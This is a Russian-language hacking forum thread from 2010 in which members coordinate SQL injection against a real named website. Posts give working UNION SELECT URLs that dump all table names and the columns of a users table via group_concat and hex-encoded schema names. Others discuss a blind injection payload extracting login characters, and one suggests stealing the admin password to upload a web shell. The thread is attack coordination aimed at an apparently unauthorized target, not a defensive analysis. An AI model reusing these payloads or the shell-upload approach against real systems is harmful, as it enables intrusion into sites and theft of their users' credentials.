HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.03.2010, 16:28
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

Цитата:
нет прав или не туда льешь.
Что можно сделать в таком случае?
 
Ответить с цитированием

  #2  
Старый 13.03.2010, 16:29
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию

Цитата:
Сообщение от CyberHunter  
Что можно сделать в таком случае?
вытаскивать пас админа зайти под его учеткой и пробовать лить шел через админку...
 
Ответить с цитированием

  #3  
Старый 13.03.2010, 16:39
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

Подскажите как сделать чтобы отобразились названия сразу всех таблиц?

Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+

Но как-то не найс через лимит по одной смотреть.
 
Ответить с цитированием

  #4  
Старый 13.03.2010, 16:42
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию

Цитата:
Сообщение от CyberHunter  
Подскажите как сделать чтобы отобразились названия сразу всех таблиц?

Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+

Но как-то не найс через лимит по одной смотреть.
скриптом каким нить сдампи структуру.
 
Ответить с цитированием

  #5  
Старый 13.03.2010, 18:09
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от CyberHunter  
Подскажите как сделать чтобы отобразились названия сразу всех таблиц?

Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+

Но как-то не найс через лимит по одной смотреть.
так можеш выводит имена всех таблиц за раз

http://www.f1-world.ru/news/news.php3?idnews=-1003090020.0%20UNION%20ALL%20SELECT%201,(select%20 concat(0x3078,Hex(cast(group_concat(table_name)%20 as%20char)))%20FROM%20information_schema.tables%20 Where%20table_schema=0x6631776F726C64),3,4,5,6,7,8 ,9,10,11,12--

а так для вывода всех колонок с таблицы users за 1 запрос

http://www.f1-world.ru/news/news.php3?idnews=-1003090020.0%20UNION%20ALL%20SELECT%201,(select%20 concat(0x3078,Hex(cast(group_concat(column_name)%2 0as%20char)))%20FROM%20information_schema.columns% 20Where%20table_schema=0x6631776F726C64%20AND%20ta ble_name=0x7573657273),3,4,5,6,7,8,9,10,11,12--

Последний раз редактировалось YuNi|[c; 13.03.2010 в 18:13..
 
Ответить с цитированием

  #6  
Старый 13.03.2010, 18:19
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами: 9288289

Репутация: 40
По умолчанию

Есть слепая инъекция
SQL запрос:
Код:
SELECT o.id_object FROM attributes a   LEFT JOIN pro_ado_objects o ON a.id=o.id_attr  WHERE a.control_type IN ('text', 'textarea') AND o.value LIKE '%%' +and+ascii(substring((SELECT login from user),1,1))>1#A%' GROUP BY o.id_object
Выдает ошибку Subquery returns more than 1 row

Есть какие то ещё варианты получить данные из таблицы?
Вывод ошибок отключен!
 
Ответить с цитированием

  #7  
Старый 13.03.2010, 18:33
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

Цитата:
Сообщение от FAQ666  
Вывод ошибок отключен!
Цитата:
Сообщение от FAQ666  
Выдает ошибку Subquery returns more than 1 row
мда)
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #8  
Старый 13.03.2010, 18:36
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами: 9288289

Репутация: 40
По умолчанию

Цитата:
Сообщение от l1ght  
мда)
А что мда? Ошибка такая. Но вывод ошибок отключен.
 
Ответить с цитированием

  #9  
Старый 13.03.2010, 18:55
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от FAQ666  
Есть слепая инъекция
SQL запрос:
Код:
SELECT o.id_object FROM attributes a   LEFT JOIN pro_ado_objects o ON a.id=o.id_attr  WHERE a.control_type IN ('text', 'textarea') AND o.value LIKE '%%' +and+ascii(substring((SELECT login from user),1,1))>1#A%' GROUP BY o.id_object
Выдает ошибку Subquery returns more than 1 row

Есть какие то ещё варианты получить данные из таблицы?
Вывод ошибок отключен!
если ссылку не в студию что тут гадать бум чтол что там
 
Ответить с цитированием

  #10  
Старый 13.03.2010, 16:47
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

Цитата:
скриптом каким нить сдампи структуру.
Как это сделать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.